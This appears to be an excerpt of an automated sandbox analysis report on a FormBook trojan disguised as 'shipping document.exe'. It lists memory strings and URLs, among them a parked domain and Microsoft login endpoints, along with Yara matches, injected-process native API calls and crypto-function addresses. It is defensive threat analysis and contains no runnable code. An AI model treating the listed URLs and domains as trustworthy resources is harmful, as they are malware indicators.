Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: openfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: openfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: openfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: openfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: openfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: openfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: openfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: shipping document.exe	String found in binary or memory: https://github.com/Deathmax/Chest-Control/raw/master/version.txt
Source: openfiles.exe, 00000007.00000002.4111642073.000000000646A000.00000004.10000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4113701461.00000000078B0000.00000004.00000800.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4111122090.000000000486A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://img.sedoparking.com/templates/images/hero_nc.svg
Source: openfiles.exe, 00000007.00000002.4110059356.0000000002AF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: openfiles.exe, 00000007.00000002.4110059356.0000000002AF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: openfiles.exe, 00000007.00000002.4110059356.0000000002AF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: openfiles.exe, 00000007.00000002.4110059356.0000000002AF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: openfiles.exe, 00000007.00000002.4110059356.0000000002AF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: openfiles.exe, 00000007.00000003.2209406963.0000000007BA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: openfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: openfiles.exe, 00000007.00000002.4111642073.000000000646A000.00000004.10000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4113701461.00000000078B0000.00000004.00000800.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4111122090.000000000486A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.namecheap.com/domains/registration/results/?domain=brothedboil.com
Source: oWRaEnEJAq.exe, 00000008.00000002.4111122090.000000000486A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.sedo.com/services/parking.php3
Source: oWRaEnEJAq.exe, 00000008.00000002.4111122090.0000000004090000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.strato.de

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.shipping document.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.shipping document.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.4110883708.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4113195669.0000000005770000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2034898129.0000000002530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4110925188.0000000004700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2034731642.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.shipping document.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.shipping document.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.4110883708.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.4113195669.0000000005770000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2034898129.0000000002530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.4110925188.0000000004700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2034731642.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: shipping document.exe

Contains functionality to call native functions

Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0042B113 NtClose,	2_2_0042B113
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A2B60 NtClose,LdrInitializeThunk,	2_2_017A2B60
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A2DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_017A2DF0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A2C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_017A2C70
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A35C0 NtCreateMutant,LdrInitializeThunk,	2_2_017A35C0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A4340 NtSetContextThread,	2_2_017A4340
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A4650 NtSuspendThread,	2_2_017A4650
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A2BF0 NtAllocateVirtualMemory,	2_2_017A2BF0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A2BE0 NtQueryValueKey,	2_2_017A2BE0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A2BA0 NtEnumerateValueKey,	2_2_017A2BA0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A2B80 NtQueryInformationFile,	2_2_017A2B80
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A2AF0 NtWriteFile,	2_2_017A2AF0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A2AD0 NtReadFile,	2_2_017A2AD0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A2AB0 NtWaitForSingleObject,	2_2_017A2AB0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A2D30 NtUnmapViewOfSection,	2_2_017A2D30
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A2D10 NtMapViewOfSection,	2_2_017A2D10
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A2D00 NtSetInformationFile,	2_2_017A2D00
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A2DD0 NtDelayExecution,	2_2_017A2DD0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A2DB0 NtEnumerateKey,	2_2_017A2DB0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A2C60 NtCreateKey,	2_2_017A2C60
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A2C00 NtQueryInformationProcess,	2_2_017A2C00
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A2CF0 NtOpenProcess,	2_2_017A2CF0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A2CC0 NtQueryVirtualMemory,	2_2_017A2CC0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A2CA0 NtQueryInformationToken,	2_2_017A2CA0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A2F60 NtCreateProcessEx,	2_2_017A2F60
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A2F30 NtCreateSection,	2_2_017A2F30
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A2FE0 NtCreateFile,	2_2_017A2FE0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A2FB0 NtResumeThread,	2_2_017A2FB0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A2FA0 NtQuerySection,	2_2_017A2FA0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A2F90 NtProtectVirtualMemory,	2_2_017A2F90
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A2E30 NtWriteVirtualMemory,	2_2_017A2E30
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A2EE0 NtQueueApcThread,	2_2_017A2EE0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A2EA0 NtAdjustPrivilegesToken,	2_2_017A2EA0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A2E80 NtReadVirtualMemory,	2_2_017A2E80
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A3010 NtOpenDirectoryObject,	2_2_017A3010
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A3090 NtSetValueKey,	2_2_017A3090
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A39B0 NtGetContextThread,	2_2_017A39B0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A3D70 NtOpenThread,	2_2_017A3D70
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A3D10 NtOpenProcessToken,	2_2_017A3D10
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E4650 NtSuspendThread,LdrInitializeThunk,	7_2_048E4650
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E4340 NtSetContextThread,LdrInitializeThunk,	7_2_048E4340
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E2CA0 NtQueryInformationToken,LdrInitializeThunk,	7_2_048E2CA0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E2C60 NtCreateKey,LdrInitializeThunk,	7_2_048E2C60
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E2C70 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_048E2C70
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E2DD0 NtDelayExecution,LdrInitializeThunk,	7_2_048E2DD0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E2DF0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_048E2DF0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E2D10 NtMapViewOfSection,LdrInitializeThunk,	7_2_048E2D10
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E2D30 NtUnmapViewOfSection,LdrInitializeThunk,	7_2_048E2D30
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E2E80 NtReadVirtualMemory,LdrInitializeThunk,	7_2_048E2E80
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E2EE0 NtQueueApcThread,LdrInitializeThunk,	7_2_048E2EE0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E2FB0 NtResumeThread,LdrInitializeThunk,	7_2_048E2FB0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E2FE0 NtCreateFile,LdrInitializeThunk,	7_2_048E2FE0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E2F30 NtCreateSection,LdrInitializeThunk,	7_2_048E2F30
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E2AD0 NtReadFile,LdrInitializeThunk,	7_2_048E2AD0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E2AF0 NtWriteFile,LdrInitializeThunk,	7_2_048E2AF0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E2BA0 NtEnumerateValueKey,LdrInitializeThunk,	7_2_048E2BA0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E2BE0 NtQueryValueKey,LdrInitializeThunk,	7_2_048E2BE0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_048E2BF0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E2B60 NtClose,LdrInitializeThunk,	7_2_048E2B60
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E35C0 NtCreateMutant,LdrInitializeThunk,	7_2_048E35C0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E39B0 NtGetContextThread,LdrInitializeThunk,	7_2_048E39B0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E2CC0 NtQueryVirtualMemory,	7_2_048E2CC0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E2CF0 NtOpenProcess,	7_2_048E2CF0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E2C00 NtQueryInformationProcess,	7_2_048E2C00
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E2DB0 NtEnumerateKey,	7_2_048E2DB0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E2D00 NtSetInformationFile,	7_2_048E2D00
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E2EA0 NtAdjustPrivilegesToken,	7_2_048E2EA0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E2E30 NtWriteVirtualMemory,	7_2_048E2E30
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E2F90 NtProtectVirtualMemory,	7_2_048E2F90
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E2FA0 NtQuerySection,	7_2_048E2FA0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E2F60 NtCreateProcessEx,	7_2_048E2F60
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E2AB0 NtWaitForSingleObject,	7_2_048E2AB0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E2B80 NtQueryInformationFile,	7_2_048E2B80
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E3090 NtSetValueKey,	7_2_048E3090
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E3010 NtOpenDirectoryObject,	7_2_048E3010
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E3D10 NtOpenProcessToken,	7_2_048E3D10
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E3D70 NtOpenThread,	7_2_048E3D70
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_027B7AB0 NtDeleteFile,	7_2_027B7AB0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_027B7B50 NtClose,	7_2_027B7B50
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_027B7860 NtCreateFile,	7_2_027B7860
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_027B79C0 NtReadFile,	7_2_027B79C0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_027B7CA0 NtAllocateVirtualMemory,	7_2_027B7CA0

Detected potential crypto function

Source: C:\Users\user\Desktop\shipping document.exe	Code function: 0_2_0315D51C	0_2_0315D51C
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 0_2_07C58CB8	0_2_07C58CB8
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 0_2_07C5CBC0	0_2_07C5CBC0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 0_2_07C59B68	0_2_07C59B68
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 0_2_07C579C8	0_2_07C579C8
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 0_2_07C5C8A8	0_2_07C5C8A8
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 0_2_07C58718	0_2_07C58718
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 0_2_07C58250	0_2_07C58250
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 0_2_07C5F0F0	0_2_07C5F0F0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 0_2_07C50040	0_2_07C50040
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 0_2_07C50006	0_2_07C50006
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 0_2_07C56EB8	0_2_07C56EB8
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 0_2_07C5BE78	0_2_07C5BE78
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 0_2_07C5BC30	0_2_07C5BC30
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 0_2_07C5AA08	0_2_07C5AA08
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 0_2_07C5B8C0	0_2_07C5B8C0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 0_2_07C5D850	0_2_07C5D850
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_00402920	2_2_00402920
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_00403350	2_2_00403350
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_00403307	2_2_00403307
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0040FBC3	2_2_0040FBC3
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0040FBBA	2_2_0040FBBA
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_004024D0	2_2_004024D0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_00416563	2_2_00416563
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0042D573	2_2_0042D573
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0041651D	2_2_0041651D
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0040FDE3	2_2_0040FDE3
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0040DE63	2_2_0040DE63
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_004046E4	2_2_004046E4
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_004026A0	2_2_004026A0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_018241A2	2_2_018241A2
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017F8158	2_2_017F8158
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_018301AA	2_2_018301AA
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_018281CC	2_2_018281CC
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01760100	2_2_01760100
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0180A118	2_2_0180A118
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01802000	2_2_01802000
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_018303E6	2_2_018303E6
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0177E3F0	2_2_0177E3F0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0182A352	2_2_0182A352
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017F02C0	2_2_017F02C0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01810274	2_2_01810274
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01830591	2_2_01830591
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01770535	2_2_01770535
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0181E4F6	2_2_0181E4F6
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01814420	2_2_01814420
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01822446	2_2_01822446
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01770770	2_2_01770770
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01794750	2_2_01794750
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0176C7C0	2_2_0176C7C0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0178C6E0	2_2_0178C6E0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01786962	2_2_01786962
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0183A9A6	2_2_0183A9A6
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017729A0	2_2_017729A0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01772840	2_2_01772840
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0177A840	2_2_0177A840
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0179E8F0	2_2_0179E8F0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017568B8	2_2_017568B8
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01826BD7	2_2_01826BD7
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0182AB40	2_2_0182AB40
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0176EA80	2_2_0176EA80
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0177AD00	2_2_0177AD00
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0176ADE0	2_2_0176ADE0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0180CD1F	2_2_0180CD1F
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01788DBF	2_2_01788DBF
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01810CB5	2_2_01810CB5
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01770C00	2_2_01770C00
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01760CF2	2_2_01760CF2
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017E4F40	2_2_017E4F40
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01790F30	2_2_01790F30
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017B2F28	2_2_017B2F28
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01812F30	2_2_01812F30
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01762FC8	2_2_01762FC8
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017EEFA0	2_2_017EEFA0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0182CE93	2_2_0182CE93
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01770E59	2_2_01770E59
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0182EEDB	2_2_0182EEDB
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0182EE26	2_2_0182EE26
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01782E90	2_2_01782E90
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0175F172	2_2_0175F172
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017A516C	2_2_017A516C
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0177B1B0	2_2_0177B1B0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0183B16B	2_2_0183B16B
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0181F0CC	2_2_0181F0CC
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0182F0E0	2_2_0182F0E0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_018270E9	2_2_018270E9
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017770C0	2_2_017770C0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0175D34C	2_2_0175D34C
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0182132D	2_2_0182132D
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017B739A	2_2_017B739A
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_018112ED	2_2_018112ED
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0178D2F0	2_2_0178D2F0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0178B2C0	2_2_0178B2C0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017752A0	2_2_017752A0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0180D5B0	2_2_0180D5B0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_018395C3	2_2_018395C3
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01827571	2_2_01827571
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01761460	2_2_01761460
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0182F43F	2_2_0182F43F
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0182F7B0	2_2_0182F7B0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017B5630	2_2_017B5630
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_018216CC	2_2_018216CC
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01779950	2_2_01779950
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0178B950	2_2_0178B950
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01805910	2_2_01805910
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017DD800	2_2_017DD800
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017738E0	2_2_017738E0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017ADBF9	2_2_017ADBF9
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017E5BF0	2_2_017E5BF0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0182FB76	2_2_0182FB76
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0178FB80	2_2_0178FB80
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017E3A6C	2_2_017E3A6C
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01811AA3	2_2_01811AA3
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0180DAAC	2_2_0180DAAC
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0181DAC6	2_2_0181DAC6
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01827A46	2_2_01827A46
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0182FA49	2_2_0182FA49
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017B5AA0	2_2_017B5AA0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01773D40	2_2_01773D40
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0178FDC0	2_2_0178FDC0
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01821D5A	2_2_01821D5A
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01827D73	2_2_01827D73
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017E9C32	2_2_017E9C32
